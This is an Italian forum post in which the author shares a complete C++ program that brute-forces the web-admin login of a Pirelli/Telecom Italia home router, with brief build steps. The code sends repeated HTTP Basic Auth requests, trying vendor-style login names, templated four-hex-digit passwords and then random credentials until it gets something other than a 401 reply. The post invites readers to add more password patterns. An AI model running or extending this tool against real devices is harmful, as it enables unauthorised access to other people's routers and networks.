Ciao a tutti! sono anche io uno sfortunato possessore del brutto ufo :(, nella sua specie peggiore ! (1.0.2 :x)... ho scritto un programmino che prova un po di password a caso, lo posto qui cosi se qualcuno ha qualche buona idea puo' modificarlo per provare altre password! :twisted: :D
1) create un file di testo, copiate il codice e lo salviate come hammer.cpp da qualche parte;
2) aprite un terminale, e andate nella directory dove avete salvato il file hammer.cpp, usando il comando:
Se funziona, dovrebbe fermarsi e stampare ad un certo punto la login/ password trovata, se no va avanti un bel po e poi smette (un bel po = qualche anno... :) )... io non ho mai potuto provarlo con un pirelli 1.0.1, cosi' non so se funziona veramente, se qualcuno ha la possibilita' prova!? grazie! :)
Non dovrebbe fare danni, visto che si limita a fare delle richieste http... praticamente e' come se provaste a mano tutte le password da un web browser, nulla piu'...
Pyper.
Codice: Seleziona tutto
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <iostream>
#include <time.h>
#include <sys/time.h>
using namespace std;
// *********************************************************
// *** Things to encode base64 password for http request ***
// *********************************************************
// code copied somewhere don't remember where ! thanks ! :)
static const char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
#define BAD -1
static const char base64val[] = {
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD,
BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD
};
#define DECODE64(c) (isascii(c) ? base64val[c] : BAD)
void to64frombits(unsigned char *out, const unsigned char *in, int inlen) {
for (; inlen >= 3; inlen -= 3) {
*out++ = base64digits[in[0] >> 2];
*out++ = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)];
*out++ = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)];
*out++ = base64digits[in[2] & 0x3f];
in += 3;
}
if (inlen > 0) {
unsigned char fragment;
*out++ = base64digits[in[0] >> 2];
fragment = (in[0] << 4) & 0x30;
if (inlen > 1)
fragment |= in[1] >> 4;
*out++ = base64digits[fragment];
*out++ = (inlen < 2) ? '=' : base64digits[(in[1] << 2) & 0x3c];
*out++ = '=';
}
*out = '\0';
}
// *******************************************************
// *** Try doing an http request to the ugly pirellone ***
// *******************************************************
struct sockaddr_in __Pirellone_Address;
bool try_hammering(const char *login, const char *passwd) {
int sockfd;
while (1) {
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
std::cerr << "Error in socket creation(" << errno << ":" << strerror(errno) << ").\n";
} else if (connect(sockfd,(const sockaddr*)&__Pirellone_Address,sizeof(__Pirellone_Address)) == -1) {
std::cerr << "Error in socket (" << sockfd << ") connection (" << errno << ":" << strerror(errno) << ").\n";
} else break;
}
static char buf[512], enc[128], inb[64];
snprintf(buf,sizeof(buf),"%s:%s",login,passwd); to64frombits((unsigned char*)enc,(unsigned char*)buf,strlen(buf));
snprintf(buf,sizeof(buf),"GET /doc/index.html HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n",enc);
write(sockfd,buf,strlen(buf));
for (unsigned int i = 0; i < sizeof(inb); i += read(sockfd,inb + i,sizeof(inb) - i));
bool good = ((strstr(inb,"401") == 0L)); // If error 401:Unauthorized not found, found passwd/login!
if (good) {
std::cerr << "FOUND: login:" << login << " passwd:" << passwd << "\n";
std::cout << "FOUND: login:" << login << " passwd:" << passwd << "\n";
exit(0);
}
close(sockfd);
return(good);
}
// Try some tabled login/passwd
static const char *try_login[] = {
"TELECOM",
"TELECOMITALIA",
0L
};
static const char *try_passwd[] = {
"%04x",
"%04X",
"pi%04xsl",
"PI%04XSL",
"pi%04Xsl",
"PI%04xSL",
0L
};
void try_some() {
for (unsigned int i = 0; try_login[i] != 0L; i++) {
std::cerr << "Try login <" << try_login[i] << ">.\n";
for (unsigned int j = 0; try_passwd[j] != 0L; j++) {
std::cerr << "Try passwd 16bit template <" << try_passwd[j] << ">.\n";
for (unsigned int k = 0; k < 65536; k++) {
if ( (k % 1980) == 0) std::cerr << "..." << k << "\n";
char buf[128];
snprintf(buf,sizeof(buf),try_passwd[j],(int)k);
try_hammering(try_login[i],buf);
}
}
}
}
static const char brute_chars[] = "0123456789abcdefghijklmnopqrstuvxywzABCDEFGHIJKLMNOPQRSTUVWXYZ";
void try_brute() {
char l[14] = {0},p[14] = {0};
std::cerr << "Trying luckyness ! :)\n";
for (unsigned int i = 0; i < 100000000; i++) {
if ( (i % 1980) == 0) std::cerr << "..." << i << " (" << l << ":" << p << ").\n";
unsigned int ll = 4 + random() % (sizeof(l)-5);
unsigned int lp = 3 + random() % (sizeof(p)-4);
l[ll] = 0; p[lp] = 0;
for (unsigned int j = 0; j < ll; j++) l[j] = brute_chars[random() % sizeof(brute_chars)];
for (unsigned int j = 0; j < lp; j++) p[j] = brute_chars[random() % sizeof(brute_chars)];
try_hammering(l,p);
for (unsigned int j = 0; try_login[j] != 0L; j++) try_hammering(try_login[j],p);
}
}
// *****************************************
// *** Main does inits and tries passwds ***
// *****************************************
int main(int argc, char *argv[]) {
const char *host_name;
// Init random seed
struct timeval t;
gettimeofday(&t,0L);
srandom(t.tv_sec ^ t.tv_usec);
// Set host name
if (argc < 2) {
host_name = "10.0.0.2";
} else {
host_name = argv[1];
}
// Find out Pirellone address
struct hostent *server = gethostbyname(host_name);
if (server == NULL) {
std::cerr << "No pirellone at <" << host_name << ">.\n";
exit(0);
}
int portno = 80; // http port
bzero((char *) &__Pirellone_Address, sizeof(__Pirellone_Address));
__Pirellone_Address.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&__Pirellone_Address.sin_addr.s_addr, server->h_length);
__Pirellone_Address.sin_port = htons(portno);
// Let's try some pattens
try_some();
try_brute();
// Add more here...
}